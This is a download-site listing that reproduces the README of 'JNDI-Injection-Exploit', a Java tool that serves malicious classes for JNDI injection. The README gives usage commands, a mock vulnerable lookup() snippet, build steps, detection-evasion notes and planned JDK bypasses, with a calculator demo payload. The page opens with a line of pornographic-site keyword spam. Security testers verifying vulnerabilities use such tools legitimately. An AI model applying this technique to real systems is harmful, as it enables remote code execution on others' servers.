伦伦影院久久影视,天天操天天干天天射,ririsao久久精品一区 ,一本大道香蕉大久在红桃,999久久久免费精品国产色夜,色悠悠久久综合88,亚洲国产精品久久无套麻豆,亚洲香蕉毛片久久网站,一本一道久久综合狠狠老

電子發燒友App

硬聲App

掃碼添加小助手

加入工程師交流群

0
  • 聊天消息
  • 系統消息
  • 評論與回復
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術視頻
  • 寫文章/發帖/加入社區
會員中心
創作中心

完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

3天內不再提示
電子發燒友網>電子資料下載>電子資料>JNDI-Injection-Exploit JNDI注入測試工具

JNDI-Injection-Exploit JNDI注入測試工具

2022-06-14 | zip | 0.36 MB | 次下載 | 2積分

資料介紹

授權協議 MIT
開發語言 Java
操作系統 跨平臺
軟件類型 開源軟件
所屬分類 開發工具、 測試工具

軟件簡介

JNDI-Injection-Exploit —— JNDI 注入利用工具,生成 JNDI 鏈接并啟動后端相關服務,可用于 Fastjson、Jackson 等相關漏洞的驗證。

使用

可執行程序為 jar 包,在命令行中運行以下命令:

$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]

其中:

  • -C?- 遠程 class 文件中要執行的命令。

    (可選項 , 默認命令是 mac 下打開計算器,即"open /Applications/Calculator.app")

  • -A?- 服務器地址,可以是 IP 地址或者域名。

    (可選項 , 默認地址是第一個網卡地址)

注意:

  • 要確保?10991389、8180?端口可用,不被其他程序占用。

    或者你也可以在 run.ServerStart 類 26~28 行更改默認端口。

  • 命令會被作為參數傳入?Runtime.getRuntime().exec(),

    所以需要確保命令傳入 exec() 方法可執行。

    bash等可在shell直接執行的相關命令需要加雙引號,比如說 java -jar JNDI.jar -C "bash -c ..."

示例

本地演示:

  1. 啟動 JNDI-Injection-Exploit:

    $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /Applications/Calculator.app" -A "127.0.0.1"

poYBAGKjJXCAaDW1AAJ7A5uaRg0090.png

我們需要把第一步中生成的 JNDI 鏈接注入到存在漏洞的應用環境中,方便解釋用如下代碼模仿漏洞環境:

public static void main(String[] args) throws Exception{
    InitialContext ctx = new InitialContext();
    ctx.lookup("rmi://127.0.0.1/fgf4fp");
}

當上面代碼運行后,應用便會執行相應命令,這里是彈出計算器,沒截圖,可以自己測一下。

截圖是工具的server端日志:

pYYBAGKjJXKAPjLkAAO3qzJEzW0904.png

安裝

下面兩種方法都可以得到Jar包

  1. ?Realease直接下載最新的Jar。

  2. 把源碼下載到本地然后自行編譯打包。(在Java1.7+ 、Java1.8+ 和 Maven 3.x+環境下測試可以)

    $ git clone https://github.com/welk1n/JNDI-Injection-Exploit.git
    $ cd JNDI-Injection-Exploit
    $ mvn clean package -DskipTests

工具實現

  1. 首先生成的鏈接后面codebaseClass是6位隨機的,這個是因為不希望讓工具生成的鏈接本身成為一種特征被監控或攔截。
  2. 服務器地址實際就是codebase地址,相比于marshalsec中的JNDI server來說,這個工具把JNDI server和HTTP server綁定到一起,并自動啟動HTTP server返回相應class,更自動化了。
  3. HTTP server基于jetty實現的,本質上是一個能下載文件的servlet,比較有意思的是我提前編譯好class模板放到resource目錄,然后servlet會讀取class文件,使用ASM框架對讀取的字節碼進行修改,然后插入我們想要執行的命令,返回修改后的字節碼。

待實現

  • (已完成EL表達式繞過部分)在更高版本的 JDK 環境中 trustURLCodebase 變量為 false,限制了遠程類的加載,我會找時間把JNDI-Injection-Bypass這個項目的東西融入到本項目中,生成能繞過 JDK 限制 JNDI 鏈接。
?

JAVA Injection Jackson
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

下載該資料的人也在下載 下載該資料的人還在閱讀
更多 >

評論

查看更多

下載排行

本周

  1. 1EMC PCB設計總結
  2. 0.33 MB   |  6次下載  |  免費
  3. 2LLC變換器的原理特點與應用領域
  4. 1.54 MB   |  1次下載  |  1 積分
  5. 3索尼14n 20n系列維修手冊
  6. 3.68 MB   |  次下載  |  1 積分
  7. 4晶益微 JY6166 音頻codec驅動資料分享
  8. 0.73 MB   |  次下載  |  免費
  9. 5晶益微 JY6311 音頻codec驅動資料分享
  10. 0.77 MB   |  次下載  |  免費
  11. 6英集芯 IP5518V 集成MCU 的TWS耳機充電倉管理SoC數據手冊
  12. 8.35 MB   |  次下載  |  免費
  13. 7英集芯 IP5518 集成MCU的TWS耳機充電倉管理SoC數據手冊
  14. 7.53 MB   |  次下載  |  免費
  15. 8英集芯 IP5518H 集成MCU的30V高耐壓TWs耳機充電倉管理S0C數據手冊
  16. 8.33 MB   |  次下載  |  免費

本月

  1. 1EMC PCB設計總結
  2. 0.33 MB   |  6次下載  |  免費
  3. 2耗盡型MOS FET產品目錄選型表
  4. 0.14 MB   |  4次下載  |  免費
  5. 3PD取電芯片 ECP5702規格書
  6. 0.88 MB   |  4次下載  |  免費
  7. 4氮化鎵GaN FET/GaN HEMT 功率驅動電路選型表
  8. 0.10 MB   |  2次下載  |  免費
  9. 52EDL05x06xx系列 600V半橋門驅動器帶集成自舉二極管(BSD)手冊
  10. 0.69 MB   |  1次下載  |  免費
  11. 6TI系列-米爾TI AM62L核心板開發板-高能效低功耗嵌入式平臺
  12. 1.51 MB  |  1次下載  |  免費
  13. 7PD取電芯片,可取5/9/12/15/20V電壓ECP5702數據手冊
  14. 0.88 MB   |  1次下載  |  免費
  15. 8飛騰FT2000-4 COM Express核心板技術手冊0603
  16. 1.22 MB  |  1次下載  |  免費

總榜

  1. 1matlab軟件下載入口
  2. 未知  |  935137次下載  |  10 積分
  3. 2開源硬件-PMP21529.1-4 開關降壓/升壓雙向直流/直流轉換器 PCB layout 設計
  4. 1.48MB  |  420064次下載  |  10 積分
  5. 3Altium DXP2002下載入口
  6. 未知  |  233095次下載  |  10 積分
  7. 4電路仿真軟件multisim 10.0免費下載
  8. 340992  |  191457次下載  |  10 積分
  9. 5十天學會AVR單片機與C語言視頻教程 下載
  10. 158M  |  183360次下載  |  10 積分
  11. 6labview8.5下載
  12. 未知  |  81606次下載  |  10 積分
  13. 7Keil工具MDK-Arm免費下載
  14. 0.02 MB  |  73832次下載  |  10 積分
  15. 8LabVIEW 8.6下載
  16. 未知  |  65991次下載  |  10 積分